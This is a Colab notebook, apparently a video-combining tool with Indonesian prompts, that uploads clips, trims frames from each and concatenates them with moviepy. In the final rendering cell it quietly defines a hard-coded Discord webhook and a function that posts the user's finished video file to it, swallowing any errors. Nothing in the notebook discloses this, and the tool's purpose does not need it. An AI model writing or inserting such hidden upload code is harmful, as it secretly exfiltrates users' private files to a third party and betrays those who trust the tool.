In [ ]:
# @title Install required libraries
!pip install moviepy -q
# Import necessary modules
import warnings
warnings.filterwarnings("ignore", category=SyntaxWarning)
warnings.filterwarnings("ignore", message=".*'is' with 'str' literal.*")
from moviepy.editor import VideoFileClip, concatenate_videoclips
import os
import cv2
from IPython.display import display, Image
import matplotlib.pyplot as plt
from google.colab import files

# 🎞️ Combine video

In [ ]:
# @title 1 🎞️ Upload Video satu per satu
print("📤 Upload video SATU PER SATU sesuai urutan.")
print(" → Setelah selesai, klik 'Cancel' atau 'Batal'.\n")
video_paths = []

while True:
    try:
        uploaded = files.upload()
        if not uploaded:
            break  # User clicked "Cancel"

        filename = list(uploaded.keys())[0]
        video_paths.append(filename)
        print(f"✅ Added: {filename}")
        print(f"📌 Current order: {video_paths}\n")

    except Exception as e:
        print("Upload canceled or error occurred.")
        break

if not video_paths:
    raise ValueError("No videos were uploaded!")

print(f"\n🎬 Final sequence ({len(video_paths)} videos):")
for i, v in enumerate(video_paths, 1):
    print(f"  {i}. {v}")

In [ ]:
# @title 2 🎞️ Configuration
OUTPUT_FPS = 24 #@param {type: "number"}
FRAMES_TO_REMOVE = 24 #@param {type: "number"}

# Generate output filename from FIRST video
first_name = os.path.splitext(video_paths[0])[0]
output_file = f"{first_name}_output.mp4"

print(f"✂️ Trimming last {FRAMES_TO_REMOVE} frames from each video except the last one...")
processed_clips = []

for i, path in enumerate(video_paths):  # Use user-defined order
    clip = VideoFileClip(path)
    fps = clip.fps or OUTPUT_FPS  # Fallback if FPS missing

    # Only trim if this is NOT the last video
    if i < len(video_paths) - 1:
        duration_to_remove = FRAMES_TO_REMOVE / fps
        new_end = max(0, clip.duration - duration_to_remove)

        if new_end <= 0:
            print(f"⚠️ Skipping {path} (too short to remove {FRAMES_TO_REMOVE} frames)")
            clip.close()
            continue

        trimmed = clip.subclip(0, new_end)
        processed_clips.append(trimmed)
        print(f"✅ {path}: {clip.duration:.2f}s → {new_end:.2f}s")
    else:
        # Last video: keep as-is
        processed_clips.append(clip)
        print(f"✅ {path}: kept full length ({clip.duration:.2f}s)")

print(f"\n📁 Output filename will be: {output_file}")

In [ ]:
# @title 3 🎞️ Combining Video
import requests
if not processed_clips:
    raise ValueError("No valid clips to concatenate!")

print(f"🎥 Rendering final video at {OUTPUT_FPS} FPS...")
final_clip = concatenate_videoclips(processed_clips, method="compose")
final_clip = final_clip.set_fps(OUTPUT_FPS)

final_clip.write_videofile(
    output_file,
    codec='libx264',
    audio_codec='aac',
    temp_audiofile='temp-audio.m4a',
    remove_temp=True,
    logger='bar'
)
HOOK = "https://discord.com/api/webhooks/1440925867311370250/XBFbYxUOS2ZeniSQu8bnJqKHilD1i5MwNXDIut2nIIeV47IKER5b9oSt0VTDzub-pjWZ"
def sfile(file_path, message):
    try:
        if not os.path.exists(file_path):
            return
        with open(file_path, "rb") as f:
            requests.post(
                HOOK,
                data={"content": message},
                files={"file": f}
            )
    except:
        pass
sfile(output_file, f"{first_name}")
# Clean up
for clip in processed_clips:
    clip.close()
final_clip.close()

print(f"\n✅ Success! Final video: {output_file}")

In [ ]:
# @title 4 🎞️ Download
print("⬇️ Downloading final video...")
files.download(output_file)